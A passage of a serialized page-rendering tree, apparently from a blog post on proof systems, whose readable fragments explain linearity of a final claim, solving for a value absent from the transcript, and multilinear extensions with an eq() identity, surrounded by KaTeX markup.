},{"className":115494,"style":335},[257],[],{"type":25,"tag":216,"props":115497,"children":115499},{"className":115498},[235],[115500,115504,115561,115565,115570],{"type":25,"tag":216,"props":115501,"children":115503},{"className":115502,"style":4827},[240],[],{"type":25,"tag":216,"props":115505,"children":115507},{"className":115506},[246],[115508,115513],{"type":25,"tag":216,"props":115509,"children":115511},{"className":115510,"style":2752},[246,2151],[115512],{"type":31,"value":97829},{"type":25,"tag":216,"props":115514,"children":115516},{"className":115515},[2159],[115517],{"type":25,"tag":216,"props":115518,"children":115520},{"className":115519},[298,299],[115521,115550],{"type":25,"tag":216,"props":115522,"children":115524},{"className":115523},[304],[115525,115545],{"type":25,"tag":216,"props":115526,"children":115528},{"className":115527,"style":2270},[309],[115529],{"type":25,"tag":216,"props":115530,"children":115531},{"style":2774},[115532,115536],{"type":25,"tag":216,"props":115533,"children":115535},{"className":115534,"style":2181},[319],[],{"type":25,"tag":216,"props":115537,"children":115539},{"className":115538},[2186,2187,2188,2189],[115540],{"type":25,"tag":216,"props":115541,"children":115543},{"className":115542},[246,2151,2189],[115544],{"type":31,"value":2289},{"type":25,"tag":216,"props":115546,"children":115548},{"className":115547},[408],[115549],{"type":31,"value":411},{"type":25,"tag":216,"props":115551,"children":115553},{"className":115552},[304],[115554],{"type":25,"tag":216,"props":115555,"children":115557},{"className":115556,"style":2209},[309],[115558],{"type":25,"tag":216,"props":115559,"children":115560},{},[],{"type":25,"tag":216,"props":115562,"children":115564},{"className":115563,"style":258},[257],[],{"type":25,"tag":216,"props":115566,"children":115568},{"className":115567},[263],[115569],{"type":31,"value":266},{"type":25,"tag":216,"props":115571,"children":115573},{"className":115572,"style":258},[257],[],{"type":25,"tag":216,"props":115575,"children":115577},{"className":115576},[235],[115578,115582,115587,115592,115597,115601,115606],{"type":25,"tag":216,"props":115579,"children":115581},{"className":115580,"style":5513},[240],[],{"type":25,"tag":216,"props":115583,"children":115585},{"className":115584},[246,2151],[115586],{"type":31,"value":162},{"type":25,"tag":216,"props":115588,"children":115590},{"className":115589},[287],[115591],{"type":31,"value":1850},{"type":25,"tag":216,"props":115593,"children":115595},{"className":115594},[246],[115596],{"type":31,"value":184},{"type":25,"tag":216,"props":115598,"children":115600},{"className":115599,"style":335},[257],[],{"type":25,"tag":216,"props":115602,"children":115604},{"className":115603},[340],[115605],{"type":31,"value":3378},{"type":25,"tag":216,"props":115607,"children":115609},{"className":115608,"style":335},[257],[],{"type":25,"tag":216,"props":115611,"children":115613},{"className":115612},[235],[115614,115618,115623,115680,115685,115689,115694],{"type":25,"tag":216,"props":115615,"children":115617},{"className":115616,"style":5513},[240],[],{"type":25,"tag":216,"props":115619,"children":115621},{"className":115620},[246],[115622],{"type":31,"value":331},{"type":25,"tag":216,"props":115624,"children":115626},{"className":115625},[246],[115627,115632],{"type":25,"tag":216,"props":115628,"children":115630},{"className":115629,"style":2752},[246,2151],[115631],{"type":31,"value":97829},{"type":25,"tag":216,"props":115633,"children":115635},{"className":115634},[2159],[115636],{"type":25,"tag":216,"props":115637,"children":115639},{"className":115638},[298,299],[115640,115669],{"type":25,"tag":216,"props":115641,"children":115643},{"className":115642},[304],[115644,115664],{"type":25,"tag":216,"props":115645,"children":115647},{"className":115646,"style":2270},[309],[115648],{"type":25,"tag":216,"props":115649,"children":115650},{"style":2774},[115651,115655],{"type":25,"tag":216,"props":115652,"children":115654},{"className":115653,"style":2181},[319],[],{"type":25,"tag":216,"props":115656,"children":115658},{"className":115657},[2186,2187,2188,2189],[115659],{"type":25,"tag":216,"props":115660,"children":115662},{"className":115661},[246,2151,2189],[115663],{"type":31,"value":2289},{"type":25,"tag":216,"props":115665,"children":115667},{"className":115666},[408],[115668],{"type":31,"value":411},{"type":25,"tag":216,"props":115670,"children":115672},{"className":115671},[304],[115673],{"type":25,"tag":216,"props":115674,"children":115676},{"className":115675,"style":2209},[309],[115677],{"type":25,"tag":216,"props":115678,"children":115679},{},[],{"type":25,"tag":216,"props":115681,"children":115683},{"className":115682},[427],[115684],{"type":31,"value":1888},{"type":25,"tag":216,"props":115686,"children":115688},{"className":115687,"style":335},[257],[],{"type":25,"tag":216,"props":115690,"children":115692},{"className":115691},[340],[115693],{"type":31,"value":3539},{"type":25,"tag":216,"props":115695,"children":115697},{"className":115696,"style":335},[257],[],{"type":25,"tag":216,"props":115699,"children":115701},{"className":115700},[235],[115702,115706,115777,115781,115786],{"type":25,"tag":216,"props":115703,"children":115705},{"className":115704,"style":114396},[240],[],{"type":25,"tag":216,"props":115707,"children":115709},{"className":115708},[246],[115710,115715],{"type":25,"tag":216,"props":115711,"children":115713},{"className":115712,"style":2679},[246,2151],[115714],{"type":31,"value":2682},{"type":25,"tag":216,"props":115716,"children":115718},{"className":115717},[2159],[115719],{"type":25,"tag":216,"props":115720,"children":115722},{"className":115721},[298,299],[115723,115766],{"type":25,"tag":216,"props":115724,"children":115726},{"className":115725},[304],[115727,115761],{"type":25,"tag":216,"props":115728,"children":115730},{"className":115729,"style":2270},[309],[115731],{"type":25,"tag":216,"props":115732,"children":115733},{"style":2702},[115734,115738],{"type":25,"tag":216,"props":115735,"children":115737},{"className":115736,"style":2181},[319],[],{"type":25,"tag":216,"props":115739,"children":115741},{"className":115740},[2186,2187,2188,2189],[115742],{"type":25,"tag":216,"props":115743,"children":115745},{"className":115744},[246,2189],[115746,115751,115756],{"type":25,"tag":216,"props":115747,"children":115749},{"className":115748},[246,2151,2189],[115750],{"type":31,"value":2289},{"type":25,"tag":216,"props":115752,"children":115754},{"className":115753},[340,2189],[115755],{"type":31,"value":3378},{"type":25,"tag":216,"props":115757,"children":115759},{"className":115758},[246,2189],[115760],{"type":31,"value":184},{"type":25,"tag":216,"props":115762,"children":115764},{"className":115763},[408],[115765],{"type":31,"value":411},{"type":25,"tag":216,"props":115767,"children":115769},{"className":115768},[304],[115770],{"type":25,"tag":216,"props":115771,"children":115773},{"className":115772,"style":114465},[309],[115774],{"type":25,"tag":216,"props":115775,"children":115776},{},[],{"type":25,"tag":216,"props":115778,"children":115780},{"className":115779,"style":335},[257],[],{"type":25,"tag":216,"props":115782,"children":115784},{"className":115783},[340],[115785],{"type":31,"value":343},{"type":25,"tag":216,"props":115787,"children":115789},{"className":115788,"style":335},[257],[],{"type":25,"tag":216,"props":115791,"children":115793},{"className":115792},[235],[115794,115798],{"type":25,"tag":216,"props":115795,"children":115797},{"className":115796,"style":4827},[240],[],{"type":25,"tag":216,"props":115799,"children":115801},{"className":115800},[246],[115802,115807],{"type":25,"tag":216,"props":115803,"children":115805},{"className":115804,"style":2752},[246,2151],[115806],{"type":31,"value":97829},{"type":25,"tag":216,"props":115808,"children":115810},{"className":115809},[2159],[115811],{"type":25,"tag":216,"props":115812,"children":115814},{"className":115813},[298,299],[115815,115844],{"type":25,"tag":216,"props":115816,"children":115818},{"className":115817},[304],[115819,115839],{"type":25,"tag":216,"props":115820,"children":115822},{"className":115821,"style":2270},[309],[115823],{"type":25,"tag":216,"props":115824,"children":115825},{"style":2774},[115826,115830],{"type":25,"tag":216,"props":115827,"children":115829},{"className":115828,"style":2181},[319],[],{"type":25,"tag":216,"props":115831,"children":115833},{"className":115832},[2186,2187,2188,2189],[115834],{"type":25,"tag":216,"props":115835,"children":115837},{"className":115836},[246,2151,2189],[115838],{"type":31,"value":2289},{"type":25,"tag":216,"props":115840,"children":115842},{"className":115841},[408],[115843],{"type":31,"value":411},{"type":25,"tag":216,"props":115845,"children":115847},{"className":115846},[304],[115848],{"type":25,"tag":216,"props":115849,"children":115851},{"className":115850,"style":2209},[309],[115852],{"type":25,"tag":216,"props":115853,"children":115854},{},[],{"type":25,"tag":38,"props":115856,"children":115857},{},[115858,115859,115955,115957,115982,115984,116009],{"type":31,"value":50104},{"type":25,"tag":9273,"props":115860,"children":115861},{},[115862,115864],{"type":31,"value":115863},"linear in ",{"type":25,"tag":82,"props":115865,"children":115867},{"className":115866},[212,4702],[115868],{"type":25,"tag":216,"props":115869,"children":115871},{"className":115870},[224],[115872],{"type":25,"tag":216,"props":115873,"children":115875},{"className":115874,"ariaHidden":230},[229],[115876],{"type":25,"tag":216,"props":115877,"children":115879},{"className":115878},[235],[115880,115884],{"type":25,"tag":216,"props":115881,"children":115883},{"className":115882,"style":114396},[240],[],{"type":25,"tag":216,"props":115885,"children":115887},{"className":115886},[246],[115888,115893],{"type":25,"tag":216,"props":115889,"children":115891},{"className":115890,"style":2679},[246,2151],[115892],{"type":31,"value":2682},{"type":25,"tag":216,"props":115894,"children":115896},{"className":115895},[2159],[115897],{"type":25,"tag":216,"props":115898,"children":115900},{"className":115899},[298,299],[115901,115944],{"type":25,"tag":216,"props":115902,"children":115904},{"className":115903},[304],[115905,115939],{"type":25,"tag":216,"props":115906,"children":115908},{"className":115907,"style":2270},[309],[115909],{"type":25,"tag":216,"props":115910,"children":115911},{"style":2702},[115912,115916],{"type":25,"tag":216,"props":115913,"children":115915},{"className":115914,"style":2181},[319],[],{"type":25,"tag":216,"props":115917,"children":115919},{"className":115918},[2186,2187,2188,2189],[115920],{"type":25,"tag":216,"props":115921,"children":115923},{"className":115922},[246,2189],[115924,115929,115934],{"type":25,"tag":216,"props":115925,"children":115927},{"className":115926},[246,2151,2189],[115928],{"type":31,"value":2289},{"type":25,"tag":216,"props":115930,"children":115932},{"className":115931},[340,2189],[115933],{"type":31,"value":3378},{"type":25,"tag":216,"props":115935,"children":115937},{"className":115936},[246,2189],[115938],{"type":31,"value":184},{"type":25,"tag":216,"props":115940,"children":115942},{"className":115941},[408],[115943],{"type":31,"value":411},{"type":25,"tag":216,"props":115945,"children":115947},{"className":115946},[304],[115948],{"type":25,"tag":216,"props":115949,"children":115951},{"className":115950,"style":114465},[309],[115952],{"type":25,"tag":216,"props":115953,"children":115954},{},[],{"type":31,"value":115956},"! By induction, the final claim is linear in the original ",{"type":25,"tag":82,"props":115958,"children":115960},{"className":115959},[212,4702],[115961],{"type":25,"tag":216,"props":115962,"children":115964},{"className":115963},[224],[115965],{"type":25,"tag":216,"props":115966,"children":115968},{"className":115967,"ariaHidden":230},[229],[115969],{"type":25,"tag":216,"props":115970,"children":115972},{"className":115971},[235],[115973,115977],{"type":25,"tag":216,"props":115974,"children":115976},{"className":115975,"style":4799},[240],[],{"type":25,"tag":216,"props":115978,"children":115980},{"className":115979,"style":2679},[246,2151],[115981],{"type":31,"value":2682},{"type":31,"value":115983},". If ",{"type":25,"tag":82,"props":115985,"children":115987},{"className":115986},[212,4702],[115988],{"type":25,"tag":216,"props":115989,"children":115991},{"className":115990},[224],[115992],{"type":25,"tag":216,"props":115993,"children":115995},{"className":115994,"ariaHidden":230},[229],[115996],{"type":25,"tag":216,"props":115997,"children":115999},{"className":115998},[235],[116000,116004],{"type":25,"tag":216,"props":116001,"children":116003},{"className":116002,"style":4799},[240],[],{"type":25,"tag":216,"props":116005,"children":116007},{"className":116006,"style":2679},[246,2151],[116008],{"type":31,"value":2682},{"type":31,"value":116010}," isn't in the transcript, we can solve for it.",{"type":25,"tag":606,"props":116012,"children":116014},{"id":116013},"multilinear-extensions-mles",[116015],{"type":31,"value":116016},"Multilinear Extensions (MLEs)",{"type":25,"tag":38,"props":116018,"children":116019},{},[116020,116022,116107],{"type":31,"value":116021},"An MLE is just the polynomial view of a table over ",{"type":25,"tag":82,"props":116023,"children":116025},{"className":116024},[212,4702],[116026],{"type":25,"tag":216,"props":116027,"children":116029},{"className":116028},[224],[116030],{"type":25,"tag":216,"props":116031,"children":116033},{"className":116032,"ariaHidden":230},[229],[116034],{"type":25,"tag":216,"props":116035,"children":116037},{"className":116036},[235],[116038,116042,116047,116052,116057,116061,116066],{"type":25,"tag":216,"props":116039,"children":116041},{"className":116040,"style":5513},[240],[],{"type":25,"tag":216,"props":116043,"children":116045},{"className":116044},[287],[116046],{"type":31,"value":80590},{"type":25,"tag":216,"props":116048,"children":116050},{"className":116049},[246],[116051],{"type":31,"value":1882},{"type":25,"tag":216,"props":116053,"children":116055},{"className":116054},[1864],[116056],{"type":31,"value":1867},{"type":25,"tag":216,"props":116058,"children":116060},{"className":116059,"style":1871},[257],[],{"type":25,"tag":216,"props":116062,"children":116064},{"className":116063},[246],[116065],{"type":31,"value":184},{"type":25,"tag":216,"props":116067,"children":116069},{"className":116068},[427],[116070,116075],{"type":25,"tag":216,"props":116071,"children":116073},{"className":116072},[427],[116074],{"type":31,"value":38103},{"type":25,"tag":216,"props":116076,"children":116078},{"className":116077},[2159],[116079],{"type":25,"tag":216,"props":116080,"children":116082},{"className":116081},[298],[116083],{"type":25,"tag":216,"props":116084,"children":116086},{"className":116085},[304],[116087],{"type":25,"tag":216,"props":116088,"children":116090},{"className":116089,"style":6083},[309],[116091],{"type":25,"tag":216,"props":116092,"children":116093},{"style":6104},[116094,116098],{"type":25,"tag":216,"props":116095,"children":116097},{"className":116096,"style":2181},[319],[],{"type":25,"tag":216,"props":116099,"children":116101},{"className":116100},[2186,2187,2188,2189],[116102],{"type":25,"tag":216,"props":116103,"children":116105},{"className":116104},[246,2151,2189],[116106],{"type":31,"value":2196},{"type":31,"value":116108},": it matches the table on Boolean points and extends it to field points.",{"type":25,"tag":38,"props":116110,"children":116111},{},[116112],{"type":31,"value":116113},"For this post, the only property you need is:",{"type":25,"tag":38,"props":116115,"children":116116},{},[116117],{"type":25,"tag":82,"props":116118,"children":116120},{"className":116119},[212,4702],[116121],{"type":25,"tag":216,"props":116122,"children":116124},{"className":116123},[224],[116125],{"type":25,"tag":216,"props":116126,"children":116128},{"className":116127,"ariaHidden":230},[229],[116129,116290,116561],{"type":25,"tag":216,"props":116130,"children":116132},{"className":116131},[235],[116133,116138,116206,116211,116272,116277,116281,116286],{"type":25,"tag":216,"props":116134,"children":116137},{"className":116135,"style":116136},[240],"height:1.1813em;vertical-align:-0.25em;",[],{"type":25,"tag":216,"props":116139,"children":116142},{"className":116140},[246,116141],"accent",[116143],{"type":25,"tag":216,"props":116144,"children":116146},{"className":116145},[298,299],[116147,116194],{"type":25,"tag":216,"props":116148,"children":116150},{"className":116149},[304],[116151,116189],{"type":25,"tag":216,"props":116152,"children":116155},{"className":116153,"style":116154},[309],"height:0.9313em;",[116156,116169],{"type":25,"tag":216,"props":116157,"children":116159},{"style":116158},"top:-3em;",[116160,116164],{"type":25,"tag":216,"props":116161,"children":116163},{"className":116162,"style":320},[319],[],{"type":25,"tag":216,"props":116165,"children":116167},{"className":116166,"style":99359},[246,2151],[116168],{"type":31,"value":37047},{"type":25,"tag":216,"props":116170,"children":116172},{"style":116171},"top:-3.6134em;",[116173,116177],{"type":25,"tag":216,"props":116174,"children":116176},{"className":116175,"style":320},[319],[],{"type":25,"tag":216,"props":116178,"children":116182},{"className":116179,"style":116181},[116180],"accent-body","left:-0.0833em;",[116183],{"type":25,"tag":216,"props":116184,"children":116186},{"className":116185},[246],[116187],{"type":31,"value":116188},"~",{"type":25,"tag":216,"props":116190,"children":116192},{"className":116191},[408],[116193],{"type":31,"value":411},{"type":25,"tag":216,"props":116195,"children":116197},{"className":116196},[304],[116198],{"type":25,"tag":216,"props":116199,"children":116202},{"className":116200,"style":116201},[309],"height:0.1944em;",[116203],{"type":25,"tag":216,"props":116204,"children":116205},{},[],{"type":25,"tag":216,"props":116207,"children":116209},{"className":116208},[287],[116210],{"type":31,"value":1850},{"type":25,"tag":216,"props":116212,"children":116214},{"className":116213},[246,116141],[116215],{"type":25,"tag":216,"props":116216,"children":116218},{"className":116217},[298],[116219],{"type":25,"tag":216,"props":116220,"children":116222},{"className":116221},[304],[116223],{"type":25,"tag":216,"props":116224,"children":116227},{"className":116225,"style":116226},[309],"height:0.714em;",[116228,116240],{"type":25,"tag":216,"props":116229,"children":116230},{"style":116158},[116231,116235],{"type":25,"tag":216,"props":116232,"children":116234},{"className":116233,"style":320},[319],[],{"type":25,"tag":216,"props":116236,"children":116238},{"className":116237,"style":2752},[246,2151],[116239],{"type":31,"value":97829},{"type":25,"tag":216,"props":116241,"children":116242},{"style":116158},[116243,116247],{"type":25,"tag":216,"props":116244,"children":116246},{"className":116245,"style":320},[319],[],{"type":25,"tag":216,"props":116248,"children":116251},{"className":116249,"style":116250},[116180],"left:-0.1799em;",[116252],{"type":25,"tag":216,"props":116253,"children":116257},{"className":116254,"style":116256},[116255],"overlay","height:0.714em;width:0.471em;",[116258],{"type":25,"tag":38236,"props":116259,"children":116266},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},"http://www.w3.org/2000/svg","0.471em","0.714em","width:0.471em","0 0 471 714","xMinYMin",[116267],{"type":25,"tag":116268,"props":116269,"children":116271},"path",{"d":116270},"M377 20c0-5.333 1.833-10 5.5-14S391 0 397 0c4.667 0 8.667 1.667 12 5\n3.333 2.667 6.667 9 10 19 6.667 24.667 20.333 43.667 41 57 7.333 4.667 11\n10.667 11 18 0 6-1 10-3 12s-6.667 5-14 9c-28.667 14.667-53.667 35.667-75 63\n-1.333 1.333-3.167 3.5-5.5 6.5s-4 4.833-5 5.5c-1 .667-2.5 1.333-4.5 2s-4.333 1\n-7 1c-4.667 0-9.167-1.833-13.5-5.5S337 184 337 178c0-12.667 15.667-32.333 47-59\nH213l-171-1c-8.667-6-13-12.333-13-19 0-4.667 4.333-11.333 13-20h359\nc-16-25.333-24-45-24-59z",[],{"type":25,"tag":216,"props":116273,"children":116275},{"className":116274},[427],[116276],{"type":31,"value":1888},{"type":25,"tag":216,"props":116278,"children":116280},{"className":116279,"style":258},[257],[],{"type":25,"tag":216,"props":116282,"children":116284},{"className":116283},[263],[116285],{"type":31,"value":266},{"type":25,"tag":216,"props":116287,"children":116289},{"className":116288,"style":258},[257],[],{"type":25,"tag":216,"props":116291,"children":116293},{"className":116292},[235],[116294,116299,116479,116483,116488,116493,116543,116548,116552,116557],{"type":25,"tag":216,"props":116295,"children":116298},{"className":116296,"style":116297},[240],"height:1.4918em;vertical-align:-0.5144em;",[],{"type":25,"tag":216,"props":116300,"children":116302},{"className":116301},[1841],[116303,116308],{"type":25,"tag":216,"props":116304,"children":116306},{"className":116305,"style":25584},[1841,4048,25583],[116307],{"type":31,"value":4052},{"type":25,"tag":216,"props":116309,"children":116311},{"className":116310},[2159],[116312],{"type":25,"tag":216,"props":116313,"children":116315},{"className":116314},[298,299],[116316,116467],{"type":25,"tag":216,"props":116317,"children":116319},{"className":116318},[304],[116320,116462],{"type":25,"tag":216,"props":116321,"children":116323},{"className":116322,"style":5097},[309],[116324],{"type":25,"tag":216,"props":116325,"children":116327},{"style":116326},"top:-2.3606em;margin-left:0em;margin-right:0.05em;",[116328,116332],{"type":25,"tag":216,"props":116329,"children":116331},{"className":116330,"style":2181},[319],[],{"type":25,"tag":216,"props":116333,"children":116335},{"className":116334},[2186,2187,2188,2189],[116336],{"type":25,"tag":216,"props":116337,"children":116339},{"className":116338},[246,2189],[116340,116394,116399,116404,116409,116414,116419],{"type":25,"tag":216,"props":116341,"children":116343},{"className":116342},[246,116141,2189],[116344],{"type":25,"tag":216,"props":116345,"children":116347},{"className":116346},[298],[116348],{"type":25,"tag":216,"props":116349,"children":116351},{"className":116350},[304],[116352],{"type":25,"tag":216,"props":116353,"children":116356},{"className":116354,"style":116355},[309],"height:0.9774em;",[116357,116371],{"type":25,"tag":216,"props":116358,"children":116360},{"style":116359},"top:-2.714em;",[116361,116366],{"type":25,"tag":216,"props":116362,"children":116365},{"className":116363,"style":116364},[319],"height:2.714em;",[],{"type":25,"tag":216,"props":116367,"children":116369},{"className":116368},[246,2151,2189],[116370],{"type":31,"value":7171},{"type":25,"tag":216,"props":116372,"children":116374},{"style":116373},"top:-2.9774em;",[116375,116379],{"type":25,"tag":216,"props":116376,"children":116378},{"className":116377,"style":116364},[319],[],{"type":25,"tag":216,"props":116380,"children":116383},{"className":116381,"style":116382},[116180],"left:-0.2355em;",[116384],{"type":25,"tag":216,"props":116385,"children":116387},{"className":116386,"style":116256},[116255,2189],[116388],{"type":25,"tag":38236,"props":116389,"children":116390},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116391],{"type":25,"tag":116268,"props":116392,"children":116393},{"d":116270},[],{"type":25,"tag":216,"props":116395,"children":116397},{"className":116396},[263,2189],[116398],{"type":31,"value":25647},{"type":25,"tag":216,"props":116400,"children":116402},{"className":116401},[287,2189],[116403],{"type":31,"value":80590},{"type":25,"tag":216,"props":116405,"children":116407},{"className":116406},[246,2189],[116408],{"type":31,"value":1882},{"type":25,"tag":216,"props":116410,"children":116412},{"className":116411},[1864,2189],[116413],{"type":31,"value":1867},{"type":25,"tag":216,"props":116415,"children":116417},{"className":116416},[246,2189],[116418],{"type":31,"value":184},{"type":25,"tag":216,"props":116420,"children":116422},{"className":116421},[427,2189],[116423,116428],{"type":25,"tag":216,"props":116424,"children":116426},{"className":116425},[427,2189],[116427],{"type":31,"value":38103},{"type":25,"tag":216,"props":116429,"children":116431},{"className":116430},[2159],[116432],{"type":25,"tag":216,"props":116433,"children":116435},{"className":116434},[298],[116436],{"type":25,"tag":216,"props":116437,"children":116439},{"className":116438},[304],[116440],{"type":25,"tag":216,"props":116441,"children":116444},{"className":116442,"style":116443},[309],"height:0.5935em;",[116445],{"type":25,"tag":216,"props":116446,"children":116448},{"style":116447},"top:-2.786em;margin-right:0.0714em;",[116449,116453],{"type":25,"tag":216,"props":116450,"children":116452},{"className":116451,"style":5106},[319],[],{"type":25,"tag":216,"props":116454,"children":116456},{"className":116455},[2186,5111,5112,2189],[116457],{"type":25,"tag":216,"props":116458,"children":116460},{"className":116459},[246,2151,2189],[116461],{"type":31,"value":2196},{"type":25,"tag":216,"props":116463,"children":116465},{"className":116464},[408],[116466],{"type":31,"value":411},{"type":25,"tag":216,"props":116468,"children":116470},{"className":116469},[304],[116471],{"type":25,"tag":216,"props":116472,"children":116475},{"className":116473,"style":116474},[309],"height:0.5144em;",[116476],{"type":25,"tag":216,"props":116477,"children":116478},{},[],{"type":25,"tag":216,"props":116480,"children":116482},{"className":116481,"style":1871},[257],[],{"type":25,"tag":216,"props":116484,"children":116486},{"className":116485,"style":99359},[246,2151],[116487],{"type":31,"value":37047},{"type":25,"tag":216,"props":116489,"children":116491},{"className":116490},[287],[116492],{"type":31,"value":1850},{"type":25,"tag":216,"props":116494,"children":116496},{"className":116495},[246,116141],[116497],{"type":25,"tag":216,"props":116498,"children":116500},{"className":116499},[298],[116501],{"type":25,"tag":216,"props":116502,"children":116504},{"className":116503},[304],[116505],{"type":25,"tag":216,"props":116506,"children":116508},{"className":116507,"style":116355},[309],[116509,116521],{"type":25,"tag":216,"props":116510,"children":116511},{"style":116158},[116512,116516],{"type":25,"tag":216,"props":116513,"children":116515},{"className":116514,"style":320},[319],[],{"type":25,"tag":216,"props":116517,"children":116519},{"className":116518},[246,2151],[116520],{"type":31,"value":7171},{"type":25,"tag":216,"props":116522,"children":116524},{"style":116523},"top:-3.2634em;",[116525,116529],{"type":25,"tag":216,"props":116526,"children":116528},{"className":116527,"style":320},[319],[],{"type":25,"tag":216,"props":116530,"children":116532},{"className":116531,"style":116382},[116180],[116533],{"type":25,"tag":216,"props":116534,"children":116536},{"className":116535,"style":116256},[116255],[116537],{"type":25,"tag":38236,"props":116538,"children":116539},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116540],{"type":25,"tag":116268,"props":116541,"children":116542},{"d":116270},[],{"type":25,"tag":216,"props":116544,"children":116546},{"className":116545},[427],[116547],{"type":31,"value":1888},{"type":25,"tag":216,"props":116549,"children":116551},{"className":116550,"style":335},[257],[],{"type":25,"tag":216,"props":116553,"children":116555},{"className":116554},[340],[116556],{"type":31,"value":343},{"type":25,"tag":216,"props":116558,"children":116560},{"className":116559,"style":335},[257],[],{"type":25,"tag":216,"props":116562,"children":116564},{"className":116563},[235],[116565,116570,116580,116585,116634,116639,116643,116692],{"type":25,"tag":216,"props":116566,"children":116569},{"className":116567,"style":116568},[240],"height:1.2274em;vertical-align:-0.25em;",[],{"type":25,"tag":216,"props":116571,"children":116573},{"className":116572},[246,31],[116574],{"type":25,"tag":216,"props":116575,"children":116577},{"className":116576},[246],[116578],{"type":31,"value":116579},"eq",{"type":25,"tag":216,"props":116581,"children":116583},{"className":116582},[287],[116584],{"type":31,"value":1850},{"type":25,"tag":216,"props":116586,"children":116588},{"className":116587},[246,116141],[116589],{"type":25,"tag":216,"props":116590,"children":116592},{"className":116591},[298],[116593],{"type":25,"tag":216,"props":116594,"children":116596},{"className":116595},[304],[116597],{"type":25,"tag":216,"props":116598,"children":116600},{"className":116599,"style":116355},[309],[116601,116613],{"type":25,"tag":216,"props":116602,"children":116603},{"style":116158},[116604,116608],{"type":25,"tag":216,"props":116605,"children":116607},{"className":116606,"style":320},[319],[],{"type":25,"tag":216,"props":116609,"children":116611},{"className":116610},[246,2151],[116612],{"type":31,"value":7171},{"type":25,"tag":216,"props":116614,"children":116615},{"style":116523},[116616,116620],{"type":25,"tag":216,"props":116617,"children":116619},{"className":116618,"style":320},[319],[],{"type":25,"tag":216,"props":116621,"children":116623},{"className":116622,"style":116382},[116180],[116624],{"type":25,"tag":216,"props":116625,"children":116627},{"className":116626,"style":116256},[116255],[116628],{"type":25,"tag":38236,"props":116629,"children":116630},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116631],{"type":25,"tag":116268,"props":116632,"children":116633},{"d":116270},[],{"type":25,"tag":216,"props":116635,"children":116637},{"className":116636},[1864],[116638],{"type":31,"value":1867},{"type":25,"tag":216,"props":116640,"children":116642},{"className":116641,"style":1871},[257],[],{"type":25,"tag":216,"props":116644,"children":116646},{"className":116645},[246,116141],[116647],{"type":25,"tag":216,"props":116648,"children":116650},{"className":116649},[298],[116651],{"type":25,"tag":216,"props":116652,"children":116654},{"className":116653},[304],[116655],{"type":25,"tag":216,"props":116656,"children":116658},{"className":116657,"style":116226},[309],[116659,116671],{"type":25,"tag":216,"props":116660,"children":116661},{"style":116158},[116662,116666],{"type":25,"tag":216,"props":116663,"children":116665},{"className":116664,"style":320},[319],[],{"type":25,"tag":216,"props":116667,"children":116669},{"className":116668,"style":2752},[246,2151],[116670],{"type":31,"value":97829},{"type":25,"tag":216,"props":116672,"children":116673},{"style":116158},[116674,116678],{"type":25,"tag":216,"props":116675,"children":116677},{"className":116676,"style":320},[319],[],{"type":25,"tag":216,"props":116679,"children":116681},{"className":116680,"style":116250},[116180],[116682],{"type":25,"tag":216,"props":116683,"children":116685},{"className":116684,"style":116256},[116255],[116686],{"type":25,"tag":38236,"props":116687,"children":116688},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116689],{"type":25,"tag":116268,"props":116690,"children":116691},{"d":116270},[],{"type":25,"tag":216,"props":116693,"children":116695},{"className":116694},[427],[116696],{"type":31,"value":1888},{"type":25,"tag":38,"props":116698,"children":116699},{},[116700,116702,116771,116773,116919,116921,117060,117062,117146],{"type":31,"value":116701},"At a fixed challenge point ",{"type":25,"tag":82,"props":116703,"children":116705},{"className":116704},[212,4702],[116706],{"type":25,"tag":216,"props":116707,"children":116709},{"className":116708},[224],[116710],{"type":25,"tag":216,"props":116711,"children":116713},{"className":116712,"ariaHidden":230},[229],[116714],{"type":25,"tag":216,"props":116715,"children":116717},{"className":116716},[235],[116718,116722],{"type":25,"tag":216,"props":116719,"children":116721},{"className":116720,"style":116226},[240],[],{"type":25,"tag":216,"props":116723,"children":116725},{"className":116724},[246,116141],[116726],{"type":25,"tag":216,"props":116727,"children":116729},{"className":116728},[298],[116730],{"type":25,"tag":216,"props":116731,"children":116733},{"className":116732},[304],[116734],{"type":25,"tag":216,"props":116735,"children":116737},{"className":116736,"style":116226},[309],[116738,116750],{"type":25,"tag":216,"props":116739,"children":116740},{"style":116158},[116741,116745],{"type":25,"tag":216,"props":116742,"children":116744},{"className":116743,"style":320},[319],[],{"type":25,"tag":216,"props":116746,"children":116748},{"className":116747,"style":2752},[246,2151],[116749],{"type":31,"value":97829},{"type":25,"tag":216,"props":116751,"children":116752},{"style":116158},[116753,116757],{"type":25,"tag":216,"props":116754,"children":116756},{"className":116755,"style":320},[319],[],{"type":25,"tag":216,"props":116758,"children":116760},{"className":116759,"style":116250},[116180],[116761],{"type":25,"tag":216,"props":116762,"children":116764},{"className":116763,"style":116256},[116255],[116765],{"type":25,"tag":38236,"props":116766,"children":116767},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116768],{"type":25,"tag":116268,"props":116769,"children":116770},{"d":116270},[],{"type":31,"value":116772},", the coefficients ",{"type":25,"tag":82,"props":116774,"children":116776},{"className":116775},[212,4702],[116777],{"type":25,"tag":216,"props":116778,"children":116780},{"className":116779},[224],[116781],{"type":25,"tag":216,"props":116782,"children":116784},{"className":116783,"ariaHidden":230},[229],[116785],{"type":25,"tag":216,"props":116786,"children":116788},{"className":116787},[235],[116789,116793,116802,116807,116856,116861,116865,116914],{"type":25,"tag":216,"props":116790,"children":116792},{"className":116791,"style":116568},[240],[],{"type":25,"tag":216,"props":116794,"children":116796},{"className":116795},[246,31],[116797],{"type":25,"tag":216,"props":116798,"children":116800},{"className":116799},[246],[116801],{"type":31,"value":116579},{"type":25,"tag":216,"props":116803,"children":116805},{"className":116804},[287],[116806],{"type":31,"value":1850},{"type":25,"tag":216,"props":116808,"children":116810},{"className":116809},[246,116141],[116811],{"type":25,"tag":216,"props":116812,"children":116814},{"className":116813},[298],[116815],{"type":25,"tag":216,"props":116816,"children":116818},{"className":116817},[304],[116819],{"type":25,"tag":216,"props":116820,"children":116822},{"className":116821,"style":116355},[309],[116823,116835],